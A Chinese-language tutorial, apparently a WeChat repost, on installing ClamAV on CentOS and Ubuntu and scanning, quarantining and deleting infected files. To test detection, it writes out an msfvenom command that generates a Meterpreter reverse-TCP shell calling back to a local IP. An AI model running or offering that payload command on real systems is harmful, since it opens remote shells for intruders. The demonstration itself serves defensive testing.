对于杀毒软件,我们已经司空见惯。但是想在Linux中进行病毒扫描,却并非易事。今天给大家介绍如何在Linux中进行查杀病毒。
介绍
Clam AntiVirus 是一款 UNIX 下开源的 (GPL) 反病毒工具包,专为邮件网关上的电子邮件扫描而设计。该工具包提供了包含灵活且可伸缩的监控程序、命令行扫描程序以及用于自动更新数据库的高级工具在内的大量实用程序。该工具包的核心在于可用于各类场合的反病毒引擎共享库。主要使用ClamAV开源杀毒引擎检测木马、病毒、恶意软件和其他恶意的威胁
安装
CentOS
在CentOS 上安装我们只需只需下面命令即可
yum install -y epel-release
yum install -y clamav
ubuntu上安装
sudo apt install -y clamav
当然,我们还可以通过编译源码的方法进行安装。只不过上诉安装方式是最简单的方法了。
查看帮助
clamscan -h
命令比较多,但是最常用的也就是下面的几项,我们一一道来!
使用
更新病毒库
我们只需执行命令freshclam便可以完成对病毒库的更新。
扫描
参数
-
-r: 指定目标 -
-l: 指定日志 -
-max-dir-recursion: 指定扫描深度
扫描文件
clamscan targetfile
示例
递归扫描home目录,并且记录日志
clamscan -r -i /home -l /var/log/clamscan.log
递归扫描home目录,将病毒文件删除,并且记录日志
clamscan -r -i /home --remove -l /var/log/clamscan.log
扫描指定目录,然后将感染文件移动到指定目录,并记录日志
clamscan -r -i /home --move=/opt/infected -l /var/log/clamscan.log
查杀效果
如,我们在msf中生成一个Linux Shell。上传服务器进行查杀!
生成一个shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.123.43 lport=5555 -f elf -o kali.elf
查杀
clamscan kali.elf --remove -l clamscan.log
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):Linux下的杀毒软件ClamAV安装及使用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论